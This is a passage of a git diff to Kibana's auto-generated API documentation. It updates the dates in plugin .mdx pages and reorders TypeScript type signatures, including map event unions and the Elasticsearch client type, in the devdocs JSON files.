\"deletion\" | \"denied\" | \"installation\"" ], "path": "packages/kbn-logging/src/ecs/event.ts", "deprecated": false, diff --git a/api_docs/kbn_logging.mdx b/api_docs/kbn_logging.mdx index 25e4ad79bcab6..46e541c754317 100644 --- a/api_docs/kbn_logging.mdx 
+++ b/api_docs/kbn_logging.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-logging title: "@kbn/logging" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/logging plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/logging'] --- import kbnLoggingObj from './kbn_logging.devdocs.json'; diff --git a/api_docs/kbn_logging_mocks.mdx b/api_docs/kbn_logging_mocks.mdx index 9bd617715fb7e..1d6bb68071c1f 100644 --- a/api_docs/kbn_logging_mocks.mdx +++ b/api_docs/kbn_logging_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-logging-mocks title: "@kbn/logging-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/logging-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/logging-mocks'] --- import kbnLoggingMocksObj from './kbn_logging_mocks.devdocs.json'; diff --git a/api_docs/kbn_managed_vscode_config.mdx b/api_docs/kbn_managed_vscode_config.mdx index ccbfebd0158ff..cd050763491cc 100644 --- a/api_docs/kbn_managed_vscode_config.mdx +++ b/api_docs/kbn_managed_vscode_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-managed-vscode-config title: "@kbn/managed-vscode-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/managed-vscode-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/managed-vscode-config'] --- import kbnManagedVscodeConfigObj from './kbn_managed_vscode_config.devdocs.json'; diff --git a/api_docs/kbn_mapbox_gl.devdocs.json b/api_docs/kbn_mapbox_gl.devdocs.json index be7808b1047d2..c620f401dd1fe 100644 --- a/api_docs/kbn_mapbox_gl.devdocs.json +++ b/api_docs/kbn_mapbox_gl.devdocs.json 
@@ -8105,7 +8105,7 @@ "label": "MapEvent", "description": [], "signature": [ - "\"error\" | \"rotate\" | \"move\" | \"render\" | \"data\" | \"remove\" | \"idle\" | \"resize\" | \"zoom\" | \"mousedown\" | \"mouseup\" | \"mouseover\" | \"mousemove\" | \"click\" | \"dblclick\" | \"mouseenter\" | \"mouseleave\" | \"mouseout\" | \"contextmenu\" | \"wheel\" | \"touchstart\" | \"touchend\" | \"touchmove\" | \"touchcancel\" | \"movestart\" | \"moveend\" | \"dragstart\" | \"drag\" | \"dragend\" | \"zoomstart\" | \"zoomend\" | \"rotatestart\" | \"rotateend\" | \"pitchstart\" | \"pitch\" | \"pitchend\" | \"boxzoomstart\" | \"boxzoomend\" | \"boxzoomcancel\" | \"webglcontextlost\" | \"webglcontextrestored\" | \"load\" | \"styledata\" | \"sourcedata\" | \"dataloading\" | \"styledataloading\" | \"sourcedataloading\" | \"styleimagemissing\" | \"style.load\" | \"dataabort\" | \"sourcedataabort\"" + "\"error\" | \"render\" | \"data\" | \"remove\" | \"rotate\" | \"move\" | \"idle\" | \"resize\" | \"zoom\" | \"mousedown\" | \"mouseup\" | \"mouseover\" | \"mousemove\" | \"click\" | \"dblclick\" | \"mouseenter\" | \"mouseleave\" | \"mouseout\" | \"contextmenu\" | \"wheel\" | \"touchstart\" | \"touchend\" | \"touchmove\" | \"touchcancel\" | \"movestart\" | \"moveend\" | \"dragstart\" | \"drag\" | \"dragend\" | \"zoomstart\" | \"zoomend\" | \"rotatestart\" | \"rotateend\" | \"pitchstart\" | \"pitch\" | \"pitchend\" | \"boxzoomstart\" | \"boxzoomend\" | \"boxzoomcancel\" | \"webglcontextlost\" | \"webglcontextrestored\" | \"load\" | \"styledata\" | \"sourcedata\" | \"dataloading\" | \"styledataloading\" | \"sourcedataloading\" | \"styleimagemissing\" | \"style.load\" | \"dataabort\" | \"sourcedataabort\"" ], "path": "node_modules/maplibre-gl/dist/maplibre-gl.d.ts", "deprecated": false, diff --git a/api_docs/kbn_mapbox_gl.mdx b/api_docs/kbn_mapbox_gl.mdx index 56fe06d95dc59..17949f9985e64 100644 --- a/api_docs/kbn_mapbox_gl.mdx +++ b/api_docs/kbn_mapbox_gl.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-mapbox-gl title: "@kbn/mapbox-gl" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/mapbox-gl plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/mapbox-gl'] --- import kbnMapboxGlObj from './kbn_mapbox_gl.devdocs.json'; diff --git a/api_docs/kbn_ml_agg_utils.mdx b/api_docs/kbn_ml_agg_utils.mdx index ac9fdbecd6a53..e743430e9222d 100644 --- a/api_docs/kbn_ml_agg_utils.mdx +++ b/api_docs/kbn_ml_agg_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-agg-utils title: "@kbn/ml-agg-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-agg-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-agg-utils'] --- import kbnMlAggUtilsObj from './kbn_ml_agg_utils.devdocs.json'; diff --git a/api_docs/kbn_ml_is_populated_object.mdx b/api_docs/kbn_ml_is_populated_object.mdx index 995bec325211d..3a0dfce55f800 100644 --- a/api_docs/kbn_ml_is_populated_object.mdx +++ b/api_docs/kbn_ml_is_populated_object.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-is-populated-object title: "@kbn/ml-is-populated-object" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-is-populated-object plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-is-populated-object'] --- import kbnMlIsPopulatedObjectObj from './kbn_ml_is_populated_object.devdocs.json'; diff --git a/api_docs/kbn_ml_string_hash.mdx b/api_docs/kbn_ml_string_hash.mdx index 8f5063e2b9487..25e37391bb246 100644 --- a/api_docs/kbn_ml_string_hash.mdx +++ b/api_docs/kbn_ml_string_hash.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ml-string-hash title: "@kbn/ml-string-hash" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ml-string-hash plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ml-string-hash'] --- import kbnMlStringHashObj from './kbn_ml_string_hash.devdocs.json'; diff --git a/api_docs/kbn_monaco.mdx b/api_docs/kbn_monaco.mdx index 12b966902bd5b..509eaf07ab9b7 100644 --- a/api_docs/kbn_monaco.mdx +++ b/api_docs/kbn_monaco.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-monaco title: "@kbn/monaco" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/monaco plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/monaco'] --- import kbnMonacoObj from './kbn_monaco.devdocs.json'; diff --git a/api_docs/kbn_optimizer.mdx b/api_docs/kbn_optimizer.mdx index d566d2193cdee..cb2e8e20206bb 100644 --- a/api_docs/kbn_optimizer.mdx +++ b/api_docs/kbn_optimizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-optimizer title: "@kbn/optimizer" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/optimizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/optimizer'] --- import kbnOptimizerObj from './kbn_optimizer.devdocs.json'; diff --git a/api_docs/kbn_optimizer_webpack_helpers.mdx b/api_docs/kbn_optimizer_webpack_helpers.mdx index 5fdbf8766806f..ae33d9778e5cd 100644 --- a/api_docs/kbn_optimizer_webpack_helpers.mdx +++ b/api_docs/kbn_optimizer_webpack_helpers.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-optimizer-webpack-helpers title: "@kbn/optimizer-webpack-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/optimizer-webpack-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/optimizer-webpack-helpers'] --- import kbnOptimizerWebpackHelpersObj from './kbn_optimizer_webpack_helpers.devdocs.json'; diff --git a/api_docs/kbn_performance_testing_dataset_extractor.mdx b/api_docs/kbn_performance_testing_dataset_extractor.mdx index 2f84485d02a2b..3cfa795d74c97 100644 --- a/api_docs/kbn_performance_testing_dataset_extractor.mdx +++ b/api_docs/kbn_performance_testing_dataset_extractor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-performance-testing-dataset-extractor title: "@kbn/performance-testing-dataset-extractor" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/performance-testing-dataset-extractor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/performance-testing-dataset-extractor'] --- import kbnPerformanceTestingDatasetExtractorObj from './kbn_performance_testing_dataset_extractor.devdocs.json'; diff --git a/api_docs/kbn_plugin_generator.mdx b/api_docs/kbn_plugin_generator.mdx index e1e4b0a6c9217..c52df5f692a34 100644 --- a/api_docs/kbn_plugin_generator.mdx +++ b/api_docs/kbn_plugin_generator.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-plugin-generator title: "@kbn/plugin-generator" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/plugin-generator plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/plugin-generator'] --- import kbnPluginGeneratorObj from './kbn_plugin_generator.devdocs.json'; diff --git a/api_docs/kbn_plugin_helpers.mdx b/api_docs/kbn_plugin_helpers.mdx index 07e20a4b4c69c..cefe6b19b09d5 100644 
--- a/api_docs/kbn_plugin_helpers.mdx +++ b/api_docs/kbn_plugin_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-plugin-helpers title: "@kbn/plugin-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/plugin-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/plugin-helpers'] --- import kbnPluginHelpersObj from './kbn_plugin_helpers.devdocs.json'; diff --git a/api_docs/kbn_react_field.devdocs.json b/api_docs/kbn_react_field.devdocs.json index 64ce7f66c3796..009157238dbe8 100644 --- a/api_docs/kbn_react_field.devdocs.json +++ b/api_docs/kbn_react_field.devdocs.json @@ -233,7 +233,7 @@ "\nUse the small size in condensed areas" ], "signature": [ - "\"s\" | \"m\" | undefined" + "\"m\" | \"s\" | undefined" ], "path": "packages/kbn-react-field/src/field_button/field_button.tsx", "deprecated": false @@ -375,7 +375,7 @@ "label": "ButtonSize", "description": [], "signature": [ - "\"s\" | \"m\"" + "\"m\" | \"s\"" ], "path": "packages/kbn-react-field/src/field_button/field_button.tsx", "deprecated": false, diff --git a/api_docs/kbn_react_field.mdx b/api_docs/kbn_react_field.mdx index 505d6ae6d2ef3..2b33a58d5db7d 100644 --- a/api_docs/kbn_react_field.mdx +++ b/api_docs/kbn_react_field.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-react-field title: "@kbn/react-field" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/react-field plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/react-field'] --- import kbnReactFieldObj from './kbn_react_field.devdocs.json'; diff --git a/api_docs/kbn_repo_source_classifier.mdx b/api_docs/kbn_repo_source_classifier.mdx index ad45340550c93..ac6d045f9fc90 100644 --- a/api_docs/kbn_repo_source_classifier.mdx +++ b/api_docs/kbn_repo_source_classifier.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-repo-source-classifier title: "@kbn/repo-source-classifier" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/repo-source-classifier plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/repo-source-classifier'] --- import kbnRepoSourceClassifierObj from './kbn_repo_source_classifier.devdocs.json'; diff --git a/api_docs/kbn_rule_data_utils.mdx b/api_docs/kbn_rule_data_utils.mdx index 08a36747ccf2a..d98d1e9372c08 100644 --- a/api_docs/kbn_rule_data_utils.mdx +++ b/api_docs/kbn_rule_data_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-rule-data-utils title: "@kbn/rule-data-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/rule-data-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/rule-data-utils'] --- import kbnRuleDataUtilsObj from './kbn_rule_data_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_autocomplete.devdocs.json b/api_docs/kbn_securitysolution_autocomplete.devdocs.json index 9e5c951dbd325..a510ecf234a9e 100644 --- a/api_docs/kbn_securitysolution_autocomplete.devdocs.json +++ b/api_docs/kbn_securitysolution_autocomplete.devdocs.json 
@@ -305,9 +305,9 @@ "\nGiven an array of lists and optionally a field this will return all\nthe lists that match against the field based on the types from the field\n\nNOTE: That we support one additional property from \"FieldSpec\" located here:\nsrc/plugins/data/common/index_patterns/fields/types.ts\nThis type property is esTypes. If it exists and is on there we will read off the esTypes." ], "signature": [ - "(lists: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[], field?: (", + "(lists: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[], field?: (", "DataViewFieldBase", - " & { esTypes?: string[] | undefined; }) | undefined) => { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; 
meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + " & { esTypes?: string[] | undefined; }) | undefined) => { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-autocomplete/src/filter_field_to_list/index.ts", "deprecated": false, 
@@ -322,7 +322,7 @@ "The lists to match against the field" ], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]" ], "path": "packages/kbn-securitysolution-autocomplete/src/filter_field_to_list/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_autocomplete.mdx b/api_docs/kbn_securitysolution_autocomplete.mdx index 67a5203e5bd8f..00d5c007b886d 100644 --- a/api_docs/kbn_securitysolution_autocomplete.mdx +++ b/api_docs/kbn_securitysolution_autocomplete.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-autocomplete title: "@kbn/securitysolution-autocomplete" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-autocomplete plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-autocomplete'] --- import kbnSecuritysolutionAutocompleteObj from './kbn_securitysolution_autocomplete.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_es_utils.devdocs.json b/api_docs/kbn_securitysolution_es_utils.devdocs.json index 6a4f5b028f3c4..821e948cf359b 100644 --- a/api_docs/kbn_securitysolution_es_utils.devdocs.json +++ b/api_docs/kbn_securitysolution_es_utils.devdocs.json 
@@ -435,7 +435,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -503,7 +553,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -529,33 +579,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -581,33 +605,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1563,6 +1561,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -1677,7 +1677,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -1745,7 +1795,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -1771,33 +1821,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -1823,33 +1847,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -2805,6 +2803,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_securitysolution_es_utils.mdx b/api_docs/kbn_securitysolution_es_utils.mdx index 84fed7de52a32..9aab6bf074430 100644 --- a/api_docs/kbn_securitysolution_es_utils.mdx +++ b/api_docs/kbn_securitysolution_es_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-es-utils title: "@kbn/securitysolution-es-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-es-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-es-utils'] --- import kbnSecuritysolutionEsUtilsObj from './kbn_securitysolution_es_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_hook_utils.mdx b/api_docs/kbn_securitysolution_hook_utils.mdx index a7c1b40b74a0b..19bd27e714fb5 100644 --- a/api_docs/kbn_securitysolution_hook_utils.mdx +++ 